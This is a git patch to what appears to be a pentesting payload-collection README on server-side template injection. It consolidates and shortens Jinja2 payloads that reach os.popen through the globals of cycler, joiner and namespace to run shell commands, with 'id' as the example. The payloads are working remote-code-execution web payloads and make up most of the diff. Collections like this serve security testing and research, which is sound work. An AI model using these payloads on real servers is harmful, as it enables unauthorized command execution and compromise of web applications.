From b5699ecf08587131c506f7958f2fc5ee58631b08 Mon Sep 17 00:00:00 2001
From: Podalirius <79218792+p0dalirius@users.noreply.github.com>
Date: Sat, 18 Sep 2021 20:03:12 +0200
Subject: [PATCH] Update README.md

---
 Server Side Template Injection/README.md | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index d2df837..858eab6 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -503,14 +503,20 @@ These payloads are context-free, and do not require anything, except being in a
 
 ```python
 {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
-```
 
-```python
 {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
+
+{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
 ```
 
+We can use these shorter payloads (this is the shorter payloads known yet):
+
 ```python
-{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
+{{ cycler.__init__.__globals__.os.popen('id').read() }}
+
+{{ joiner.__init__.__globals__.os.popen('id').read() }}
+
+{{ namespace.__init__.__globals__.os.popen('id').read() }}
 ```
 
 Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/